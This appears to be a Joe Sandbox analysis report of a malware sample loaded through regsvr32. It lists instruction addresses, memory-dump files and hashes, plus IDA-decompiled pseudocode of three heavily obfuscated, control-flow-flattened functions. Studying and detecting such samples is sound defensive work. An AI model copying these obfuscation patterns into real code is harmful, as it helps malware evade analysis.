0x04f69977
0x04f69981
0x04f6998f
0x04f69992
0x04f69996
0x04f6999b
0x04f699a3
0x04f699ab
0x04f699b8
0x04f699be
0x04f699be
0x04f699be
0x04f699ce
0x04f699d7
0x04f699dd
0x04f699dd
0x04f695bd
0x04f69729
0x04f69731
0x04f69736
0x04f6973e
0x04f6974b
0x04f69753
0x04f69758
0x04f69760
0x04f69768
0x04f6976d
0x04f69775
0x04f6977d
0x04f69782
0x04f6978a
0x04f69792
0x04f697b0
0x04f697b5
0x04f697bc
0x04f697c4
0x00000000
0x04f697c4
0x04f695c9
0x04f6971f
0x00000000
0x04f6971f
0x04f695d5
0x04f69671
0x04f69679
0x04f6967e
0x04f69686
0x04f69692
0x04f69696
0x04f6969c
0x04f696a6
0x04f696ae
0x04f696b6
0x04f696be
0x04f696c6
0x04f696ce
0x04f696dc
0x04f696e3
0x04f696e7
0x04f696ef
0x04f69702
0x04f69707
0x04f6970d
0x04f6970f
0x04f69715
0x04f69715
0x04f6970f
0x00000000
0x04f69696
0x04f695e1
0x00000000
0x00000000
0x04f695e7
0x04f695f1
0x04f695f9
0x04f69601
0x04f69609
0x04f69617
0x04f6961a
0x04f69622
0x04f69627
0x04f6962f
0x04f69637
0x04f6963f
0x04f69655
0x04f6965a
0x04f6965c
0x04f69661
0x00000000
0x04f69667
0x04f69667
0x00000000
0x04f69667
0x04f69661
0x04f697cf
0x04f697d5
0x04f69900
0x04f6990a
0x04f69912
0x04f69920
0x04f69923
0x04f69927
0x04f6992f
0x04f69937
0x04f6993f
0x04f69949
0x04f6994d
0x04f6994d
0x04f6994d
0x04f69962
0x04f69964
0x00000000
0x04f69964
0x04f697db
0x04f697e1
0x04f69869
0x04f69871
0x04f69879
0x04f69881
0x04f69889
0x04f69891
0x04f69899
0x04f698a1
0x04f698a9
0x04f698b1
0x04f698b9
0x04f698c1
0x04f698c5
0x04f698e0
0x04f698e5
0x04f698f0
0x04f698f3
0x04f698f4
0x04f698f9
0x00000000
0x04f698f9
0x04f697e7
0x04f697ed
0x00000000
0x00000000
0x04f697f3
0x04f697fd
0x04f69802
0x04f6980a
0x04f69818
0x04f6981b
0x04f6981f
0x04f69827
0x04f69834
0x04f69838
0x04f69840
0x04f69858
0x04f6985f
0x00000000
0x04f69969
0x04f69969
0x04f69969
0x00000000

Strings

J, xrefs: 04F69782
`, xrefs: 04F69937
K$, xrefs: 04F698C1
F, xrefs: 04F6990A

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: K$$`$F$J
API String ID: 0-3900766019
Opcode ID: 58da61ee220a7310a060a9b968ee9280457fde34c750fb82c74be8000295ef60
Instruction ID: b1e84cc7a2bf6a46161f9d452205b512544c99bda76f0d59bdae648697b2a531
Opcode Fuzzy Hash: 58da61ee220a7310a060a9b968ee9280457fde34c750fb82c74be8000295ef60
Instruction Fuzzy Hash: 8AB125B29093428FD318CF24E54581BBBE1FBC4754F004D2DF5A6A6260D7B4EA4E8B93

Uniqueness

Uniqueness Score: -1.00%

Function 04F69DE0 Relevance: 5.2, Strings: 4, Instructions: 218
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E04F69DE0() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				void* _t183;
				intOrPtr _t190;
				signed int _t192;
				void* _t193;
				signed int _t196;
				intOrPtr _t197;
				intOrPtr _t208;
				signed int _t210;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				intOrPtr _t219;
				signed int _t234;
				intOrPtr _t235;
				signed int* _t237;
				void* _t240;

				_t237 =  &_v548;
				_t210 = _v540;
				_t183 = 0x4651d;
				_t235 = 0;
				_v528 = 0x231ad;
				_v524 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t240 = _t183 - 0xc092d;
						if(_t240 > 0) {
							break;
						}
						if(_t240 == 0) {
							_v544 = 0x7ec8f7;
							_t211 = 0x39;
							_v544 = _v544 / _t211;
							_v544 = _v544 ^ 0x000d3954;
							_v540 = 0x947549;
							_v540 = _v540 + 0xffff2bde;
							_v540 = _v540 ^ 0x009dd471;
							_v536 = 0x7c3d20;
							_v536 = _v536 + 0xffff326a;
							_v536 = _v536 ^ 0x007511bb;
							_v532 = 0x8d04b8;
							_v532 = _v532 << 1;
							_v532 = _v532 ^ 0x0113e6cb;
							_v548 = 0x6e1840;
							_v548 = _v548 << 0xe;
							_v548 = _v548 ^ 0x861f75a6;
							_t196 = E04F77E14(_v540, _v544 % _t211, _v536, _v532, _t211, _v548, _v544); // executed
							_t210 = _t196;
							_t237 =  &(_t237[5]);
							__eflags = _t210;
							if(__eflags == 0) {
								_t183 = 0xd3e93;
							} else {
								_t197 =  *0x4f8221c; // 0x33fd420
								 *((intOrPtr*)(_t197 + 0x20c)) = 1;
								_t183 = 0x683f8;
							}
							continue;
						}
						if(_t183 == 0x4651d) {
							_v548 = 0xe1803a;
							_t213 = 0x2d;
							_v548 = _v548 / _t213;
							_t214 = 7;
							_push(_t214);
							_v548 = _v548 / _t214;
							_t228 = 0x430;
							_v548 = _v548 ^ 0x000addfb;
							_v544 = 0x9507e9;
							_v544 = _v544 + 0x3984;
							_v544 = _v544 ^ 0x009c12b0;
							 *0x4f8221c = E04F73EE6(_t214, 0x430, __eflags);
							_t183 = 0xc092d;
							continue;
						}
						if(_t183 == 0x683f8) {
							_v548 = 0xe4272f;
							_t183 = 0xa860b;
							_v548 = _v548 << 7;
							_v548 = _v548 | 0xe5805a89;
							_v548 = _v548 ^ 0xf793dfa0;
							_t234 = _v548;
							continue;
						}
						if(_t183 == 0x7c5b3) {
							_v540 = 0xb72d0c;
							_v540 = _v540 + 0xfffff94c;
							_v540 = _v540 ^ 0x00b006ea;
							_v548 = 0x42c2cb;
							_v548 = _v548 | 0xe8fc8f7a;
							_t216 = 0x29;
							_push(_t216);
							_v548 = _v548 / _t216;
							_v548 = _v548 << 0xd;
							_v548 = _v548 ^ 0xd9932262;
							E04F75B9E(_v540,  &_v520, __eflags, _v548);
							_v544 = 0xa0ba5f;
							_v544 = _v544 >> 1;
							_v544 = _v544 ^ 0x00531c9e;
							_v548 = 0xba129f;
							_v548 = _v548 | 0x5525a274;
							_v548 = _v548 << 2;
							_v548 = _v548 << 0xb;
							_v548 = _v548 ^ 0xf6580d00;
							_v536 = 0x6684b;
							_v536 = _v536 << 3;
							_v536 = _v536 ^ 0x00356901;
							_v540 = 0xc7f211;
							_v540 = _v540 << 0xd;
							_t176 =  &_v540;
							 *_t176 = _v540 ^ 0xfe41b567;
							__eflags =  *_t176;
							_t208 = E04F6D491( &_v520, _v544, _v548, _v536, _v540);
							_t219 =  *0x4f8221c; // 0x33fd420
							 *((intOrPtr*)(_t219 + 0x21c)) = _t208;
							L22:
							return _t235;
						}
						if(_t183 != 0xa860b) {
							goto L19;
						}
						_v548 = 0x5341c1;
						_t228 = _t210;
						_v548 = _v548 | 0x3604f62e;
						_v548 = _v548 << 7;
						_v548 = _v548 ^ 0x2bf732a3;
						_v544 = 0x869194;
						_v544 = _v544 | 0x7ff804fe;
						_v544 = _v544 ^ 0x7fffe241;
						E04F7F296(_v548, _t210, _v544);
						_t183 = 0xf1c5a;
					}
					__eflags = _t183 - 0xd3e93;
					if(_t183 == 0xd3e93) {
						_v544 = 0xc0ad46;
						_t183 = 0xf1c5a;
						_v544 = _v544 + 0x1a95;
						_v544 = _v544 << 8;
						_t129 =  &_v544;
						 *_t129 = _v544 ^ 0xc0c7db1c;
						__eflags =  *_t129;
						_t234 = _v544;
						goto L19;
					}
					__eflags = _t183 - 0xd864c;
					if(_t183 == 0xd864c) {
						E04F686ED();
						_t183 = 0x7c5b3;
						goto L1;
					}
					__eflags = _t183 - 0xf1c5a;
					if(_t183 != 0xf1c5a) {
						goto L19;
					}
					_v536 = 0x3b2261;
					_v536 = _v536 | 0x0961d2bd;
					_v536 = _v536 ^ 0x09751b10;
					_v548 = 0x2c8b27;
					_v548 = _v548 | 0x377b84ab;
					_v548 = _v548 * 0x58;
					_v548 = _v548 >> 0xe;
					_v548 = _v548 ^ 0x0002906d;
					_v540 = 0x4b11ec;
					_v540 = _v540 * 0xc;
					_v540 = _v540 ^ 0x0380d242;
					_v532 = 0xbb8814;
					_v532 = _v532 * 0x35;
					_v532 = _v532 | 0x5e3d2024;
					_v532 = _v532 + 0xffffef9b;
					_v532 = _v532 ^ 0x7ef12028;
					_v544 = 0x5fea71;
					_v544 = _v544 >> 1;
					_v544 = _v544 * 0x25;
					_v544 = _v544 ^ 0x06e7f886;
					_t190 =  *0x4f8221c; // 0x33fd420
					_t192 = E04F79F8B(_t234, _t228, _t234, _v536, _t190 + 4, _v548, _v540, _t234, _v532, _v544); // executed
					_t237 =  &(_t237[8]);
					__eflags = _t192;
					_t193 = 1;
					_t235 =  ==  ? _t193 : _t235;
					_t183 = 0xd864c;
					goto L1;
					L19:
					__eflags = _t183 - 0xb88c9;
				} while (__eflags != 0);
				goto L22;
			}

0x04f69de0
0x04f69de7
0x04f69deb
0x04f69df2
0x04f69df4
0x04f69e06
0x04f69e06
0x04f69e0a
0x04f69e0a
0x04f69e0a
0x04f69e0a
0x04f69e0f
0x00000000
0x00000000
0x04f69e15
0x04f69f23
0x04f69f33
0x04f69f36
0x04f69f3a
0x04f69f42
0x04f69f4a
0x04f69f52
0x04f69f5a
0x04f69f62
0x04f69f6a
0x04f69f72
0x04f69f7a
0x04f69f7e
0x04f69f86
0x04f69f8e
0x04f69f93
0x04f69fb0
0x04f69fb5
0x04f69fb7
0x04f69fba
0x04f69fbc
0x04f69fd6
0x04f69fbe
0x04f69fbe
0x04f69fc6
0x04f69fcc
0x04f69fcc
0x00000000
0x04f69fbc
0x04f69e20
0x04f69eba
0x04f69eca
0x04f69ecf
0x04f69ed9
0x04f69edc
0x04f69edd
0x04f69ee1
0x04f69ee6
0x04f69eee
0x04f69ef6
0x04f69efe
0x04f69f13
0x04f69f18
0x00000000
0x04f69f1d
0x04f69e2b
0x04f69e8f
0x04f69e97
0x04f69e9c
0x04f69ea1
0x04f69ea9
0x04f69eb1
0x00000000
0x04f69eb1
0x04f69e32
0x04f6a118
0x04f6a122
0x04f6a12a
0x04f6a132
0x04f6a13a
0x04f6a148
0x04f6a14b
0x04f6a14c
0x04f6a154
0x04f6a159
0x04f6a169
0x04f6a16e
0x04f6a17a
0x04f6a17e
0x04f6a186
0x04f6a18e
0x04f6a196
0x04f6a19b
0x04f6a1a0
0x04f6a1a8
0x04f6a1b0
0x04f6a1b5
0x04f6a1bd
0x04f6a1c5
0x04f6a1ca
0x04f6a1ca
0x04f6a1ca
0x04f6a1e2
0x04f6a1e7
0x04f6a1f0
0x04f6a1f7
0x04f6a202
0x04f6a202
0x04f69e3d
0x00000000
0x00000000
0x04f69e43
0x04f69e4b
0x04f69e4d
0x04f69e55
0x04f69e5a
0x04f69e62
0x04f69e6a
0x04f69e72
0x04f69e82
0x04f69e88
0x04f69e88
0x04f69fe0
0x04f69fe5
0x04f6a0e5
0x04f6a0ed
0x04f6a0ef
0x04f6a0f7
0x04f6a0fc
0x04f6a0fc
0x04f6a0fc
0x04f6a104
0x00000000
0x04f6a104
0x04f69feb
0x04f69ff0
0x04f6a0d6
0x04f6a0db
0x00000000
0x04f6a0db
0x04f69ff6
0x04f69ff8
0x00000000
0x00000000
0x04f69ffe
0x04f6a006
0x04f6a00e
0x04f6a016
0x04f6a01e
0x04f6a02b
0x04f6a02f
0x04f6a034
0x04f6a03c
0x04f6a049
0x04f6a04d
0x04f6a055
0x04f6a062
0x04f6a066
0x04f6a06e
0x04f6a076
0x04f6a07e
0x04f6a086
0x04f6a08f
0x04f6a093
0x04f6a0ac
0x04f6a0bc
0x04f6a0c1
0x04f6a0c4
0x04f6a0c8
0x04f6a0c9
0x04f6a0cc
0x00000000
0x04f6a108
0x04f6a108
0x04f6a108
0x00000000

Strings

a";, xrefs: 04F69FFE
q_, xrefs: 04F6A07E
/', xrefs: 04F69E8F
$ =^, xrefs: 04F6A066

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: $ =^$/'$a";$q_
API String ID: 1889721586-4109166297
Opcode ID: 065fd769d8df8f0958eba4aecfeedac11b94cd1df73746d9576284dd5655a112
Instruction ID: 903ad0fe7fc42ec3d35b41a9080ca80574f850077d17f81122fafb9c0f659b8b
Opcode Fuzzy Hash: 065fd769d8df8f0958eba4aecfeedac11b94cd1df73746d9576284dd5655a112
Instruction Fuzzy Hash: 3EA115B15083428FC308CF24E54991BBBE1FB94748F104E2DF196A6260D7B4EA5ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7DC5F Relevance: 5.2, Strings: 4, Instructions: 208
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E04F7DC5F() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				void* _t198;
				char* _t202;
				char* _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t215;
				char* _t219;
				char* _t229;
				signed int _t231;
				void* _t234;
				signed int* _t236;

				_t236 =  &_v604;
				_v596 = 0x238eb;
				_t231 = 0x6a957;
				_t206 = _v596;
				_t229 = 0;
				do {
					while(_t231 != 0x6a957) {
						if(_t231 == 0x88a9e) {
							_v584 = 0xd9feec;
							_v584 = _v584 + 0x45ed;
							_v584 = _v584 + 0x4603;
							_v584 = _v584 ^ 0x00dddd32;
							_v588 = 0x29f4de;
							_v588 = _v588 | 0xa7724137;
							_v588 = _v588 ^ 0xa772e9be;
							_v604 = 0xa3f351;
							_v604 = _v604 ^ 0x93fb5321;
							_v604 = _v604 >> 0x10;
							_v604 = _v604 ^ 0x000f7b13;
							_v596 = 0xf57938;
							_v596 = _v596 | 0xbc55ebf5;
							_v596 = _v596 ^ 0xbcfaaf0d;
							_t219 = _v588;
							E04F7786A(_v584, _t219, _v604, _v596,  &_v572);
							_t236 =  &(_t236[3]);
							_t231 = 0x9c1a3;
							continue;
						} else {
							if(_t231 == 0x94c77) {
								_v588 = 0xaf36da;
								_v588 = _v588 + 0xffff7fdb;
								_v588 = _v588 ^ 0x00ababf9;
								_v596 = 0x8747c5;
								_t208 = 0x60;
								_v596 = _v596 * 0x3d;
								_v596 = _v596 ^ 0x20365618;
								_v600 = 0xe383b5;
								_v600 = _v600 ^ 0xb10bec1a;
								_t209 = 0x77;
								_v600 = _v600 / _t208;
								_v600 = _v600 >> 0xd;
								_v600 = _v600 ^ 0x000a67a5;
								_v604 = 0xfd386;
								_push(_t209);
								_v604 = _v604 / _t209;
								_v604 = _v604 << 5;
								_v604 = _v604 ^ 0x00072742;
								E04F78915(_t206,  &_v564, _v588, _v596, _v600, _t209, _v604);
								_v596 = 0x58e9ba;
								_t219 = _t206;
								asm("sbb esi, esi");
								_v596 = _v596 ^ 0x35419cda;
								_v596 = _v596 ^ 0x3510c934;
								_v600 = 0x4de22d;
								_t231 = (_t231 & 0xfffebf32) + 0x9cb6c;
								_v600 = _v600 + 0xffffb8d1;
								_v600 = _v600 * 0x17;
								_v600 = _v600 | 0xa6430774;
								_v600 = _v600 ^ 0xa6f071a3;
								_v604 = 0x77059e;
								_v604 = _v604 | 0x1f3dedfc;
								_v604 = _v604 >> 0xc;
								_v604 = _v604 ^ 0x0004944a;
								E04F68B6C(_v596, _t219, _v600, _v604); // executed
								_t236 =  &(_t236[8]);
								goto L14;
							} else {
								if(_t231 == 0x9c1a3) {
									_t198 = E04F75CE1();
									_t234 = _v572 - _v548;
									asm("sbb ecx, [esp+0x4c]");
									__eflags = _v568 - _t219;
									if(__eflags >= 0) {
										if(__eflags > 0) {
											L19:
											_t229 = 1;
											__eflags = 1;
										} else {
											__eflags = _t234 - _t198;
											if(_t234 >= _t198) {
												goto L19;
											}
										}
									}
								} else {
									if(_t231 == 0xdc6df) {
										_v576 = 0x932c6d;
										_v576 = _v576 << 8;
										_v576 = _v576 ^ 0x932c6d80;
										_v588 = 0xb55ac0;
										_v588 = _v588 << 0xe;
										_v588 = _v588 ^ 0x56b00001;
										_v600 = 0x56d040;
										_v600 = _v600 + 0xffffd468;
										_v600 = _v600 + 0xffff5154;
										_v600 = _v600 ^ 0x071b0b95;
										_v600 = _v600 ^ 0x074efe6a;
										_v596 = 0xd32487;
										_v596 = _v596 | 0x3203a817;
										_v596 = _v596 ^ 0x32d2e922;
										_v580 = 0xc9636e;
										_v580 = _v580 + 0x3b5d;
										_v580 = _v580 + 0xffffa292;
										_v580 = _v580 + 0x6efb;
										_v580 = _v580 ^ 0x00c01d04;
										_v604 = 0x267f52;
										_v604 = _v604 >> 7;
										_v604 = _v604 ^ 0x91183676;
										_v604 = _v604 ^ 0x911404dd;
										_v592 = 0x126a83;
										_t213 = 0x61;
										_push(_t213);
										_v592 = _v592 / _t213;
										_t219 = 0;
										_v592 = _v592 | 0xf7ffffbf;
										_v592 = _v592 ^ 0xf7f3677e;
										_v584 = 0x9dce5e;
										_v584 = _v584 + 0xe192;
										_v584 = _v584 + 0xdb47;
										_v584 = _v584 ^ 0x009ecc97;
										_t202 = E04F7602C(_v600, 0, _v596, _v580, _v588, _v604, _v576,  &_v524, _v592, _t213, _v584); // executed
										_t206 = _t202;
										_t236 =  &(_t236[0xa]);
										__eflags = _t206 - 0xffffffff;
										if(__eflags != 0) {
											_t231 = 0x94c77;
											continue;
										}
									} else {
										_t243 = _t231 - 0xedda7;
										if(_t231 != 0xedda7) {
											goto L14;
										} else {
											_v592 = 0xeea287;
											_v592 = _v592 + 0xffff8956;
											_t215 = 0x72;
											_push(_t215);
											_v592 = _v592 / _t215;
											_t219 =  &_v524;
											_v592 = _v592 | 0x8694d04a;
											_v592 = _v592 ^ 0x86920dc3;
											_v604 = 0x288c01;
											_v604 = _v604 | 0x1d723980;
											_v604 = _v604 ^ 0x1d71f29a;
											if(E04F75B9E(_v592, _t219, _t243, _v604) != 0) {
												_t231 = 0xdc6df;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t229;
					}
					_t231 = 0xedda7;
					L14:
					__eflags = _t231 - 0x9cb6c;
				} while (__eflags != 0);
				goto L20;
			}

0x04f7dc5f
0x04f7dc68
0x04f7dc70
0x04f7dc75
0x04f7dc7f
0x04f7dc81
0x04f7dc81
0x04f7dc93
0x04f7df8e
0x04f7df9a
0x04f7dfa2
0x04f7dfaa
0x04f7dfb2
0x04f7dfba
0x04f7dfc2
0x04f7dfca
0x04f7dfd2
0x04f7dfda
0x04f7dfdf
0x04f7dfe7
0x04f7dfef
0x04f7dff7
0x04f7e008
0x04f7e010
0x04f7e015
0x04f7e018
0x00000000
0x04f7dc99
0x04f7dc9b
0x04f7de67
0x04f7de71
0x04f7de79
0x04f7de81
0x04f7de90
0x04f7de93
0x04f7de97
0x04f7de9f
0x04f7dea7
0x04f7deb5
0x04f7deb6
0x04f7debc
0x04f7dec1
0x04f7dec9
0x04f7ded7
0x04f7ded8
0x04f7dee0
0x04f7dee5
0x04f7df00
0x04f7df05
0x04f7df0f
0x04f7df11
0x04f7df13
0x04f7df1b
0x04f7df29
0x04f7df31
0x04f7df37
0x04f7df44
0x04f7df48
0x04f7df50
0x04f7df58
0x04f7df60
0x04f7df68
0x04f7df6d
0x04f7df81
0x04f7df86
0x00000000
0x04f7dca1
0x04f7dca7
0x04f7e035
0x04f7e03e
0x04f7e046
0x04f7e04a
0x04f7e04c
0x04f7e04e
0x04f7e054
0x04f7e056
0x04f7e056
0x04f7e050
0x04f7e050
0x04f7e052
0x00000000
0x00000000
0x04f7e052
0x04f7e04e
0x04f7dcad
0x04f7dcb3
0x04f7dd2e
0x04f7dd38
0x04f7dd3d
0x04f7dd45
0x04f7dd4d
0x04f7dd52
0x04f7dd5a
0x04f7dd62
0x04f7dd6a
0x04f7dd72
0x04f7dd7a
0x04f7dd82
0x04f7dd8a
0x04f7dd92
0x04f7dd9a
0x04f7dda2
0x04f7ddaa
0x04f7ddb2
0x04f7ddba
0x04f7ddc2
0x04f7ddca
0x04f7ddcf
0x04f7ddd7
0x04f7dddf
0x04f7dded
0x04f7ddf0
0x04f7ddf1
0x04f7ddf5
0x04f7ddf7
0x04f7de03
0x04f7de0b
0x04f7de13
0x04f7de1b
0x04f7de23
0x04f7de4d
0x04f7de52
0x04f7de54
0x04f7de57
0x04f7de5a
0x04f7de60
0x00000000
0x04f7de60
0x04f7dcb5
0x04f7dcb5
0x04f7dcbb
0x00000000
0x04f7dcc1
0x04f7dcc1
0x04f7dccb
0x04f7dcd9
0x04f7dcdc
0x04f7dcdd
0x04f7dce1
0x04f7dce5
0x04f7dced
0x04f7dcf5
0x04f7dcfd
0x04f7dd05
0x04f7dd1e
0x04f7dd24
0x00000000
0x04f7dd24
0x04f7dd1e
0x04f7dcbb
0x04f7dcb3
0x04f7dca7
0x04f7dc9b
0x04f7e057
0x04f7e063
0x04f7e063
0x04f7e022
0x04f7e027
0x04f7e027
0x04f7e027
0x00000000

Strings

-M, xrefs: 04F7DF29
wL, xrefs: 04F7DC79
];, xrefs: 04F7DDA2
E, xrefs: 04F7DF9A

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFileFindNotification
String ID: -M$];$wL$E
API String ID: 727422849-1800591318
Opcode ID: b86fdb77b853871b70145abeadc576ef9f2ab59c44035600431d6e57811968c5
Instruction ID: f36a3c4e1b026cab4ca47e26bf69d9c06f2521ee098b1e63de68aefc62b4fa8d
Opcode Fuzzy Hash: b86fdb77b853871b70145abeadc576ef9f2ab59c44035600431d6e57811968c5
Instruction Fuzzy Hash: DDA1667280C3419FD344DF24C84981BBBE1BBC8758F444A1EF4D966260D3B99A4ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7FC6F Relevance: 5.2, Strings: 4, Instructions: 181
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04F7FC6F() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t133;
				signed int _t136;
				signed int _t151;
				void* _t152;
				signed int _t153;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				void* _t167;
				void* _t180;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr* _t183;
				signed int* _t185;

				_t185 =  &_v32;
				_t151 = _v16;
				_t133 = 0x3aefc;
				_t184 = _v16;
				_t181 = _v16;
				_v12 = 0xfe981;
				_v8 = 0x5490;
				_t180 = 0;
				_v4 = 0x359b1;
				while(1) {
					L1:
					_t167 = 0x3252f;
					while(1) {
						L2:
						_t152 = 0x5c;
						do {
							L3:
							while(_t133 != 0x85a0) {
								if(_t133 == _t167) {
									_v32 = 0xd792da;
									_v32 = _v32 | 0x68e59014;
									_v32 = _v32 + 0x33b3;
									_v32 = _v32 | 0x155d3334;
									_v32 = _v32 ^ 0x7df92b0f;
									_v28 = 0x5c8bef;
									_v28 = _v28 + 0xfffff51e;
									_v28 = _v28 ^ 0xbc3c1a67;
									_v28 = _v28 ^ 0xbc6b1915;
									E04F685C7(_v32, _t151, _v28);
									_t133 = 0xa5dea;
									_t180 =  !=  ? 1 : _t180;
									while(1) {
										L1:
										_t167 = 0x3252f;
										goto L2;
									}
								} else {
									if(_t133 == 0x3aefc) {
										_t133 = 0xa02ee;
										continue;
									} else {
										if(_t133 == 0x78b11) {
											_v28 = 0xf56a1a;
											_v28 = _v28 | 0x485905b7;
											_v28 = _v28 * 0x12;
											_v28 = _v28 ^ 0x21d0db6e;
											_v32 = 0x32e1e0;
											_v32 = _v32 >> 5;
											_v32 = _v32 | 0x5310733f;
											_v32 = _v32 ^ 0x53121866;
											_v20 = 0x57c2a4;
											_v20 = _v20 + 0x66f3;
											_v20 = _v20 ^ 0x00530468;
											_t151 = E04F744FD(_v32, _t184, _t181, _v28, _v20);
											_t185 =  &(_t185[3]);
											_t167 = 0x3252f;
											_t133 =  !=  ? 0x3252f : 0xe50b4;
											goto L2;
										} else {
											if(_t133 == 0xa02ee) {
												_t182 =  *0x4f8221c; // 0x33fd420
												_t183 = _t182 + 0x220;
												while( *_t183 != _t152) {
													_t183 = _t183 + 2;
												}
												_t181 = _t183 + 2;
												_t133 = 0x85a0;
												continue;
											} else {
												if(_t133 == 0xa5dea) {
													_v24 = 0x374dac;
													_v24 = _v24 << 4;
													_v24 = _v24 ^ 0x037ab9b6;
													_v20 = 0x48942c;
													_v20 = _v20 + 0xffff4d59;
													_v20 = _v20 ^ 0x0043e364;
													E04F7F296(_v24, _t151, _v20);
													_t133 = 0xe50b4;
													while(1) {
														L1:
														_t167 = 0x3252f;
														L2:
														_t152 = 0x5c;
														goto L3;
													}
												} else {
													if(_t133 != 0xe50b4) {
														goto L23;
													} else {
														_v28 = 0xc2e532;
														_t162 = 0x19;
														_v28 = _v28 * 0x71;
														_v28 = _v28 / _t162;
														_t163 = 0xe;
														_v28 = _v28 / _t163;
														_v28 = _v28 ^ 0x003ce904;
														_v32 = 0xbb9b42;
														_v32 = _v32 | 0xbb929e66;
														_t164 = 0x24;
														_v32 = _v32 / _t164;
														_v32 = _v32 << 1;
														_v32 = _v32 ^ 0x0a600d6e;
														_t37 =  &_v32; // 0xa600d6e
														E04F7F296(_v28, _t184,  *_t37);
													}
												}
											}
										}
									}
								}
								L11:
								return _t180;
							}
							_v28 = 0x74e4c0;
							_v28 = _v28 >> 0xd;
							_v28 = _v28 + 0xd370;
							_v28 = _v28 ^ 0x000fd728;
							_v20 = 0x438e9b;
							_v20 = _v20 << 2;
							_v20 = _v20 >> 1;
							_v20 = _v20 ^ 0x0085f227;
							_v16 = 0x42981d;
							_v16 = _v16 >> 3;
							_v16 = _v16 ^ 0x000d0d0d;
							_v24 = 0x9446bf;
							_v24 = _v24 + 0x1ff4;
							_t153 = 0x17;
							_v24 = _v24 / _t153;
							_v24 = _v24 ^ 0x000936b8;
							_v32 = 0x18c5e5;
							_v32 = _v32 + 0x3185;
							_v32 = _v32 | 0xef48b565;
							_v32 = _v32 ^ 0xef5e365b;
							_t136 = E04F77E14(_v20, _v24 % _t153, _v16, _v24, _t153, _v32, _v28); // executed
							_t184 = _t136;
							_t185 =  &(_t185[5]);
							if(_t136 == 0) {
								_t133 = 0x66741;
								_t167 = 0x3252f;
								_t152 = 0x5c;
								goto L23;
							} else {
								_t133 = 0x78b11;
								goto L1;
							}
							goto L11;
							L23:
						} while (_t133 != 0x66741);
						goto L11;
					}
				}
			}

0x04f7fc6f
0x04f7fc73
0x04f7fc77
0x04f7fc7d
0x04f7fc82
0x04f7fc86
0x04f7fc8f
0x04f7fc97
0x04f7fc99
0x04f7fca1
0x04f7fca1
0x04f7fca1
0x04f7fca6
0x04f7fca6
0x04f7fca8
0x04f7fca9
0x00000000
0x04f7fca9
0x04f7fcb6
0x04f7fe66
0x04f7fe70
0x04f7fe78
0x04f7fe80
0x04f7fe88
0x04f7fe90
0x04f7fe98
0x04f7fea0
0x04f7fea8
0x04f7feb8
0x04f7fec3
0x04f7fec8
0x04f7fca1
0x04f7fca1
0x04f7fca1
0x00000000
0x04f7fca1
0x04f7fcbc
0x04f7fcc1
0x04f7fe5c
0x00000000
0x04f7fcc7
0x04f7fccc
0x04f7fdd9
0x04f7fde3
0x04f7fdf0
0x04f7fdf4
0x04f7fdfc
0x04f7fe04
0x04f7fe09
0x04f7fe11
0x04f7fe19
0x04f7fe21
0x04f7fe29
0x04f7fe43
0x04f7fe45
0x04f7fe4f
0x04f7fe54
0x00000000
0x04f7fcd2
0x04f7fcd7
0x04f7fdb6
0x04f7fdbc
0x04f7fdc7
0x04f7fdc4
0x04f7fdc4
0x04f7fdcc
0x04f7fdcf
0x00000000
0x04f7fcdd
0x04f7fce2
0x04f7fd6f
0x04f7fd79
0x04f7fd7e
0x04f7fd86
0x04f7fd8e
0x04f7fd96
0x04f7fda6
0x04f7fdac
0x04f7fca1
0x04f7fca1
0x04f7fca1
0x04f7fca6
0x04f7fca8
0x00000000
0x04f7fca8
0x04f7fce8
0x04f7fced
0x00000000
0x04f7fcf3
0x04f7fcf3
0x04f7fd04
0x04f7fd07
0x04f7fd13
0x04f7fd1b
0x04f7fd20
0x04f7fd26
0x04f7fd2e
0x04f7fd36
